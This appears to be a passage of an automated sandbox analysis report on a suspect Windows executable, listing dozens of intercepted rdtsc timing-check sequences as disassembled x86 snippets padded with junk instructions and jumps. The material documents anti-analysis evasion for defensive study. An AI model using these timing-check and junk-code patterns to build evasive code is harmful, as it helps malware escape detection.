Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C68E3C second address: C68E46 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C68EBA second address: C68F05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 00F616B5h 0x0000000f mov dword ptr [ebp+122D1FF7h], edi 0x00000015 call 00007FC19D472F29h 0x0000001a ja 00007FC19D472F2Ah 0x00000020 push eax 0x00000021 push esi 0x00000022 jo 00007FC19D472F28h 0x00000028 pushad 0x00000029 popad 0x0000002a pop esi 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f jne 00007FC19D472F2Eh 0x00000035 mov eax, dword ptr [eax] 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C68F05 second address: C68F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DCEh 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jng 00007FC19CEC1DCEh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69010 second address: C69014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69048 second address: C6904E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69223 second address: C69227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69227 second address: C6922C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6922C second address: C69232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6934B second address: C69351 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69351 second address: C69361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C697B9 second address: C697BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69B3C second address: C69B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69B40 second address: C69B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69BEF second address: C69BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC19D472F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69BF9 second address: C69C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FC19CEC1DCCh 0x00000011 jbe 00007FC19CEC1DC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C44959 second address: C4495D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4495D second address: C44965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C938AC second address: C938B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C938B2 second address: C938D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC19CEC1DD9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C93E47 second address: C93E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C93FD2 second address: C93FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C93FF2 second address: C93FF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C93FF8 second address: C94002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC19CEC1DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C94298 second address: C942A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FC19D472F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C942A4 second address: C942AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C942AA second address: C942AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA28A1 second address: CA28A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA28A5 second address: CA28AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA28AD second address: CA28D3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC19CEC1DC8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC19CEC1DCCh 0x00000013 jmp 00007FC19CEC1DCCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA28D3 second address: CA28D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA15C9 second address: CA15CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA174C second address: CA1758 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA1758 second address: CA1782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FC19CEC1DD0h 0x0000000f jmp 00007FC19CEC1DCFh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA18FC second address: CA1919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F31h 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC19D472F26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA1919 second address: CA196A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007FC19CEC1DECh 0x0000000e push esi 0x0000000f jp 00007FC19CEC1DC6h 0x00000015 pop esi 0x00000016 pushad 0x00000017 jmp 00007FC19CEC1DD0h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA202F second address: CA204D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jl 00007FC19D472F26h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA861A second address: CA863C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC19CEC1DD8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA863C second address: CA8646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC19D472F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA7119 second address: CA711F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA73E9 second address: CA73F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA77F4 second address: CA77FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA77FA second address: CA7814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC19D472F2Ch 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA7964 second address: CA7995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FC19CEC1DC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC19CEC1DCBh 0x00000012 jmp 00007FC19CEC1DD7h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA7995 second address: CA79D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC19D472F26h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC19D472F33h 0x00000013 jnp 00007FC19D472F3Bh 0x00000019 jmp 00007FC19D472F33h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA7B2B second address: CA7B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d jnp 00007FC19CEC1DD9h 0x00000013 jmp 00007FC19CEC1DCDh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA80D8 second address: CA80DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA84A8 second address: CA84AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA84AE second address: CA84B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA84B3 second address: CA84BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA6D8E second address: CA6D9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CA6D9D second address: CA6DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DCAh 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC19CEC1DD3h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop esi 0x00000019 pushad 0x0000001a jmp 00007FC19CEC1DD8h 0x0000001f jl 00007FC19CEC1DC6h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CAA9D8 second address: CAA9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jnp 00007FC19D472F26h 0x00000010 pop ecx 0x00000011 pushad 0x00000012 ja 00007FC19D472F26h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CAA9F2 second address: CAA9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1D7E5 second address: C1D7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC19D472F2Fh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1D7F9 second address: C1D801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1D801 second address: C1D813 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007FC19D472F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1D813 second address: C1D819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1D819 second address: C1D82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FC19D472F26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1D82A second address: C1D82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CAD763 second address: CAD767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CAD767 second address: CAD786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FC19CEC1DC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC19CEC1DCBh 0x00000013 jne 00007FC19CEC1DC6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CAD786 second address: CAD790 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC19D472F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CADA25 second address: CADA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CADA2B second address: CADA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FC19D472F26h 0x0000000d jp 00007FC19D472F26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB1A75 second address: CB1A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB1A79 second address: CB1A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5069 second address: CB506D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB51E5 second address: CB51EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB51EB second address: CB51F7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC19CEC1DCEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5332 second address: CB5351 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FC19D472F26h 0x00000011 jne 00007FC19D472F26h 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5351 second address: CB5359 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB561C second address: CB5620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5620 second address: CB5626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5626 second address: CB562C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB562C second address: CB5636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC19CEC1DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5636 second address: CB565B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC19D472F2Bh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB565B second address: CB5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5660 second address: CB566D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC19D472F28h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB57A1 second address: CB57AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB597B second address: CB597F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1CA second address: CBB1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1D0 second address: CBB1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC19D472F2Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1E5 second address: CBB1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1ED second address: CBB1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1F1 second address: CBB1F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB495 second address: CBB4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007FC19D472F2Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC19D472F2Dh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB903 second address: CBB916 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB916 second address: CBB93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC19D472F3Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB93B second address: CBB941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB941 second address: CBB945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB945 second address: CBB95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007FC19CEC1DC6h 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69599 second address: C6959F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC3885 second address: CC388C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
